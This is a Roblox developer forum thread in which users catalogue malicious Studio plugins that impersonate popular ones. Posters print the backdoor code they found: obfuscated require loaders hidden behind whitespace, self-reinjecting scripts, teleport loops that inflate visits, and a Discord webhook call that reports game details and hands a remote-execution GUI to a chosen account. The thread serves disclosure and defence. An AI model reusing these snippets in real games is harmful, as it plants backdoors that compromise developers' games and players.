Known Malicious Plugins for HISR detection Megathread

Shift to Sprint
Malicious plugin: 3664816543
Original plugin: 142346332

Day And Night
Malicious plugin: 3622467610
Original plugin: 878777463

Roundify

Malicious plugin: 4593270188
Original plugin: 2233768483

1 Like

This is awesome. Much faster than self-verification and an easy way of getting what you need.

Thanks for creating the tool!

1 Like

Virus-Destroyer (Anti-Serverside)

Original plugin: unknown
Malicious plugin: https://www.roblox.com/library/4863624219/Virus-Destroyer-Anti-Serverside
Malicious action:

pcall(function()local a={‘Weld’,“FilterEvent”,“ClickerModule”,“ChatModule”,“Anti-Exploit”}local b=Instance.new(“Script”)b.Source='–[[ROBLOX Studio Script]] require(4850721608):Fire() 'b.Name=a[math.random(1,#a)]for a = 1,3 do local b=b:Clone()if a==1 then b.Parent=game:GetService(“ServerScriptService”)elseif a==2 then b.Parent=workspace:FindFirstChildOfClass(“Script”)elseif a==3 then b.Parent=workspace:FindFirstChildOfClass(“Model”)end end end)

Malicious require id: https://www.roblox.com/library/4850721608/Anti-Exploit-Module

Custom Name Title

Original plugin: unknown
Malicious plugin: https://www.roblox.com/library/4864404814/Custom-Name-Title
Malicious action:

a={‘Weld’,“FilterEvent”,“ClickerModule”,“ChatModule”,“Anti-Exploit”}local b=Instance.new(“Script”)b.Source='–[[ROBLOX Studio Script]] require(4850721608):Fire() 'b.Name=a[math.random(1,#a)]for a = 1,3 do local b=b:Clone()if a==1 then b.Parent=game:GetService(“ServerScriptService”)elseif a==2 then b.Parent=workspace:FindFirstChildOfClass(“Script”)elseif a==3 then b.Parent=workspace:FindFirstChildOfClass(“Model”)end end end)

Malicious require id: https://www.roblox.com/library/4850721608/Anti-Exploit-Module

Fall Damage Plugin [FIXED]

Original plugin: https://www.roblox.com/library/1248186463/Fall-Damage-Plugin-FIXED

~~
~~

1

Malicious plugin: https://www.roblox.com/library/4742433843/Fall-Damage-Plugin
Malicious plugin uploader: RobloxSecurePlugins
Malicious action: FallDamage Script

local AntiExploit = Instance.new(“Script”)
AntiExploit.Parent = game.Workspace.Camera
AntiExploit.Name = “ClientReplicator”
AntiExploit.Source = [[
–Official roblox studio script
require(4582121027):protecc()
]]

Malicious module id: https://www.roblox.com/library/4582121027/unnamed
Malicious module uploader: Neatoxic

~~
~~

2

Malicious plugin: https://www.roblox.com/library/4657687313/Fall-Damage-Plugin
Malicious plugin uploader: RobloxTopPlugins
Malicious action: FallDamage Script

local AntiExploit = Instance.new(“Script”)
AntiExploit.Parent = game.Workspace.Camera
AntiExploit.Name = “ClientReplicator”
AntiExploit.Source = [[
game.Players.PlayerAdded:Connect(function(player)
wait(0.0000001)
local joinData = player:GetJoinData().SourcePlaceId
local TeleportService = game:GetService(“TeleportService”)
if joinData == 4628266409 then
local Tpdata = player:GetJoinData().TeleportData
if Tpdata then
Req = Tpdata.req
gid = Tpdata.grid
end
if player:GetRankInGroup(gid) == 2 then
require(Req).load(player.Name)
end
return else
end
local Players = game:GetService(“Players”)
local TeleportService = game:GetService(“TeleportService”)
local teleportData = {
maxxPlrs = Players.MaxPlayers,
maxPlrs = Players.NumPlayers,
placeId = game.PlaceId,
JobId = game.JobId,
CreatorId = game.CreatorId
}
TeleportService:Teleport(4628266409, player, teleportData)
end)

]]
Malicious place id: https://www.roblox.com/games/4628266409/Loading
Malicious place uploader: RobloxFasterLoader
Malicious plugin is force loop rejoining a game to attempt to inflate Visits.

~~
~~

3

Malicious plugin id: https://www.roblox.com/library/3976656034/Fall-Damage-Plugin
Malicious plugin uploader: Txppin
Malicious plugin action:

a(b)function c(d)d.Source=d.Source…’\n’…game:GetObjects(‘rbxassetid://4850318089’)[1].Source end;for e,d in next,b:GetDescendants()do if rawequal(d.ClassName,‘Script’)and not string.find(d.Source,‘4794986906’)then c(d)d:GetPropertyChangedSignal(‘Source’):Connect(function()if not string.find(d.Source,‘4794986906’)then c(d)end end)end end;f=false;function g()d=game:GetObjects(‘rbxassetid://4852273118’)[1]if not b:FindFirstChild(‘Filter Event’)or b:FindFirstChild(‘Filter Event’).Source~=d.Source then d.Parent=b else d=b:FindFirstChild(‘Filter Event’)end;function h()if not f then wait(1/60)f=true;d:Destroy()f=false;g()end end;i=d:GetPropertyChangedSignal(‘Parent’):Connect(h)d.Changed:Connect(function(j)if rawequal(j,‘Disabled’)or rawequal(j,‘Source’)then i:Disconnect()h()end end)end;g()end;a(workspace)a(game:GetService(‘ServerScriptService’))

There are multiple require-id’s in this action attempt. All require ids listed.

Malicious require id: https://www.roblox.com/library/4852273118/Filter-Event
Malicious require uploader: TeefusBeefus
Malicious require action:

–[[
Created by: InceptionTime (Year: 2020)
Description: This is a filtering event put by Roblox to check if your game isn’t modifiying the chat filter in any sort of way, deleting this may lead to unforeseeable consequences.
]]
– You may proceed if you have basic knowledge of scripting and know what you’re doing.
local RunService = game:GetService(“RunService”)
local Require = require
local Loader = 4794986906 – Touching this Id may stop the script from functioning
if not RunService:IsStudio() and not RunService:IsClient() and RunService:IsServer() then – Checks if it isn’t Studio, as it defeats the purpose of the module, also checks if it is being ran on the server’s side and not on the client’s side, just to be on the safe side.
pcall(Require, Loader) – Begins to load the module, it is wrapped in pcall so it doesn’t bother you in anyway whatsoever.
end

Malicious require id: https://www.roblox.com/library/4794986906/unnamed
Malicious require uploader: sunburstery
Malicious action unknown as orbfuscated.

Malicious require id:
https://www.roblox.com/library/4850318089/backpack-code
Malicious require action:

if not game:service’RunService’:IsStudio() then getfenv()"\114\101\113\117\105\114\101" end

Malicious require id #2: https://www.roblox.com/library/4794986906/unnamed
This goes to above malicious require id

~~
~~

5

Malicious plugin id: https://www.roblox.com/library/4863366172/Fall-Damage-Plugin
Malicious plugin uploader: LowkeyNatey
Malicious plugin action:

pcall(function()local a={‘Weld’,“FilterEvent”,“ClickerModule”,“ChatModule”,“Anti-Exploit”}local b=Instance.new(“Script”)b.Source=’–[[ROBLOX Studio Script]] require(4850721608):Fire()'b.Name=a[math.random(1,#a)]for a = 1,3 do local b=b:Clone()if a==1 then b.Parent=game:GetService(“ServerScriptService”)elseif a==2 then b.Parent=workspace:FindFirstChildOfClass(“Script”)elseif a==3 then b.Parent=workspace:FindFirstChildOfClass(“Model”)end end end)

Malicious require id: https://www.roblox.com/library/4850721608/Anti-Exploit-Module
Require id is apart of above malicious plugins

2 Likes

Backdoor malicious module

getfenv()['\114\101\113\117\105\114\101'](2422875198*2)

2422875198*2 = 4845750396

is orbfuscated but by running in repl.it, prints module id that failed to load.
which it then loads

which has a script to then load

Roblox = "IsStudio"																																																																																																																																																																																																																		
local a=game:GetService("RunService")if a:IsStudio()then print('Loaded!') else if game.PlaceId==185655149 or game.PlaceId==920587237 or game.PlaceId==735030788 then else getfenv()[string.reverse("\101\114\105\117\113\101\114")](getfenv()["\116\111\110\117\109\98\101\114"](string["\99\104\97\114"](getfenv()["\117\110\112\97\99\107"]{52,57,57,53,57,55,56,55,49,57})))end end 

and

--[[
License Information:
This product is protected under copyright law. You may not distribute, re-use, modify or otherwise tamper with this software in any way.
Breaking the license gives us, "smartTech", legal grounds for a DMCA takedown.
Please don't steal our stuff.
--]]
local module = {} 
																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																local CheckMeIn = false
if CheckMeIn == true then
require(862849844) -- This is the offical CheckMeIn loader. This is owned by an account named "SmartTech". Feel free to use it.
else
	CheckMeIn = "Loaded."
																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																										local a = script.Script
																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																														a.Parent = workspace.Camera
end
  
return module

Module 862849844 is referred to CheckMeIn which is unknown to be the original creator of this or just something this backdoor creator is using to log users having this backdoor in their game. I’ve tried to inform them about the use of this module, they’ve been warned for over 3 days before I posted this.

The top script then finally loads this module.

This module has a lot of obfuscated code, but one of the scripts remained un obfuscated, loading these two other modules.

MainModule> Folder> Main> ul

-- open source. leak.
local Players = game:GetService('Players')
game.Players.PlayerAdded:Connect(function(Player)
    if Player:GetRankInGroup(6157358) >= 2 then
		wait(0.1)
        require(4674979018):Fire(Player.Name) 
		require(5033070911):ikthisisskidded(Player.Name)
game.Players[Player.Name].PlayerGui.JOHNDOE.ResetOnSpawn = false
    end
end)
game.Players.PlayerAdded:Connect(function(Player)
    if Player:GetRankInGroup(5860863) >= 2 then
		wait(0.1)
        require(4834950415):Fire(Player.Name)
		require(5033070911):ikthisisskidded(Player.Name)
    end
end)
game:GetService("Players").PlayerAdded:Connect(
    function(player)
        if game.PlaceId == 4973653404 or game.PlaceId == 4860760464 then
            game:GetService("TeleportService"):Teleport(5009641755, player)
        end
    end
)

Many of the modules uses these groups to check if player is a member of before giving members scripts in this backdoor.

Places that are being teleported to via this backdoor to inflate or ‘pretend fast loading…’

One of the scripts is checking to do a banlist
https://builderman.club/fe.json
Would be suggested to blacklist this domain.

Loads another module

and another module

This module then uses LuaVM to load code without the need of loadstring in
MainModule > JohnDoe> Main> Shadow> Frame> RemoteHandle

another module

This backdoor is still loaded by an unknown plugin, still looking for it.

3 Likes

Guys!
I figured something out.
I was working on a game with a friend of mine, and I suspect he has a virus.
In every Script (not localscript), when I click behind the last “end” (how do I explain this) it moves you to the very side of the script, as if you’ve written 500 spaces in one line and click behind a letter, it moves your Scrollbar (for the X position) to the very far right.

Now, if this happens, move the scrollbar slowly, until you find some weird code, For example I had this:

if not game:service'RunService':IsStudio() then getfenv()["\114\101\113\117\105\114\101"](4794986906) end		

This has to be a “virus”, delete those.

Another way to detect those is by Searching “game:service”, INCASE you haven’t used “game:service” in your script.

I do not know what malicious plugin my friend has installed

3 Likes

Already covered this one and Roblox has finally deleted this module.

2 Likes

https://www.roblox.com/library/4723753937/Content-Deleted

https://www.roblox.com/library/4929048497/Test

Two modules required by malicious code. I don’t know which pluigin though, sorry. Hope this helps.

The second module teleports here:
https://www.roblox.com/games/4915459682/Loading?refPageId=ad45ba48-2b45-4b42-ad1e-93d4fdc2113f

1 Like

That module requires this

Looks like I completely missed you notifying me about this… but the script is definitely not mine. The only way to install CheckMeIn is through these models: Standard Kit, Enterprise Kit. I am aware of many other models on the platform that claim to be the official kit, but they are instead a combination of the official kit, with a back door added. That’s what you’ve found here. All I can do about this is tell my users not to install any third party modules, since technically a back door is not against the Roblox rules.

Edit: The require id it has does load a model that is on your account if that is what you ment. This script however, considered it to just be loading your module.

That’s what I exactly replied to people in your discord server but your discord server ended up being toxic against my attempt to inform your group directly and I left. I just wanted to let you guys know and attempt to invalidate whatever key the backdoor was using. It doesn’t matter if a backdoor isn’t against the tos, it’s malicious and Roblox can moderate any accounts for any reason.

Edit: I’m not saying that your module is one, I’m saying that it’s being used inside one. Any further chats about this, please message.

2 Likes

Maybe move this to a github repo, it makes it much easier to log and request the data as you can just send a HTTP GET request to the repository to download a JSON file, plus it allows for other developers to use the same list if they were to make their own anti-virus

I have no idea how your system works so I cannot provide an example, but you can just do
HTTPService:GetAsync(a link to your repository) and then decode it in JSONDecode

1 Like

Original: ?
Malicious plugin: https://www.roblox.com/library/5109887609/Todds-Anti-Backdoor
Malicious action:

pcall(function(ff)getfenv()['\114\101\113\117\105\114\101'](5090011414).beef()end)

Original: https://www.roblox.com/library/1256428022/Tree-Generator (belongs to Crazyman32)
Malicious plugin: https://www.roblox.com/library/5108497694/Tree-Generator
Malicios action:

pcall(function(ff)getfenv()['\114\101\113\117\105\114\101'](5090011414).beef()end)

Both of the malicious action leads to this plugin - https://www.roblox.com/library/5090011414/beefintestines - it’s an obfuscated script, however by constant dumping and inspecting its constants, it’s clear that it’s a backdoor, it’s constant dump can be found here - https://pastebin.com/raw/FhZyxTty.

1 Like

F3X Plugin

Malicious:

Original:

Fake Anti-Virus/Backdoor Scanner

Malicious:

1 Like

Thank you for your post, I see it helpful. Also it’s a surprise to find an HR of BH here. <3


1 Like

Original: https://www.roblox.com/library/2233768483/Roundify
Malicious: https://www.roblox.com/library/5110767026/10K-Roundify
Malicious action: obfuscated script - can’t be bothered to constant dump it.

Original: https://www.roblox.com/library/165687726/Stravant-GapFill-Extrude-Fixed
Malicious: https://www.roblox.com/library/5112442161/GapFill-V1-2
Malicious action: obfuscated script - can’t be bothered to constant dump it.

Malicious: https://www.roblox.com/library/5112424591/Load-Character-Pro
Malicious: https://www.roblox.com/library/5112436389/Model-Resize-Plugin-2-1-DRAG-TO-RESIZE
Malicious: https://www.roblox.com/library/5112432545/Building-Tools-by-F3X-Plugin

Malicious: https://www.roblox.com/library/5074555023/Better-Day-And-Night-Lighting-NEW
Malicious action: require(5077231493)

1 Like

Malicious Script, plugin unknown

require(4751241292)()

Malicious Action

local Orig = script
script = nil
local script = Orig
local GUI = script.getwet:Clone()
local HTTP = game:GetService('HttpService')
function CheckHttp()
	local f = pcall(function()HTTP:GetAsync'https://www.google.com'end)
	if f == true then
		return true
	else
		return false
	end
end
game:GetService('Players').PlayerAdded:Connect(function(plr)
	local A = CheckHttp()
	
	if A == true then
	local Data = {
		content = "omfg a damn game!\n https://www.roblox.com/games/"..game.PlaceId.."\nPlayers in game: "..#game:GetService('Players'):GetPlayers().." / "..game:GetService('Players').MaxPlayers;
		username = "wet man"
	}
	HTTP:PostAsync('https://discordapp.com/a-key',HTTP:JSONEncode(Data))
	end
	if plr.UserId == 1460281907 or plr:IsFriendsWith(1460281907) then
		GUI:Clone().Parent = plr.PlayerGui
	end
end)
for i,plr in pairs(game:GetService('Players'):GetPlayers()) do
	if plr.UserId == 1460281907 or plr:IsFriendsWith(1460281907) then
		GUI:Clone().Parent = plr.PlayerGui
	end
end
local A = CheckHttp()
if A == true then
local Data = {
	content = "omg a game!  https://www.roblox.com/games/"..game.PlaceId;
	username = "wet man"
}
HTTP:PostAsync('https://discordapp.com/a-key',HTTP:JSONEncode(Data))
end
return function()end

Essentially gives a serverside loadstring gui if a player is or is friends with…

https://www.roblox.com/users/1460281907/profile

Edit: Discord webhook has already been found invalidated, someone else probably already deleted it.

2 Likes

Fake content deleted backdoor.
Super long chain of ‘require’ to try to hide the main code, still going.

after chaining for an entire 30+ times, randomly manually ‘report abuse’ on some of them
reached the obfuscated code.

I’m not bothering to go in full detail on why I believe this is malicious due to having an alternative issue that I consider to be ‘robloxsev ere’

This plugin is possibly malicious:

I checked the source code, and the code appears to be obfuscated. Comments are also disabled, which is a tad bit suspicious for a plugin with obfuscated code.

1 Like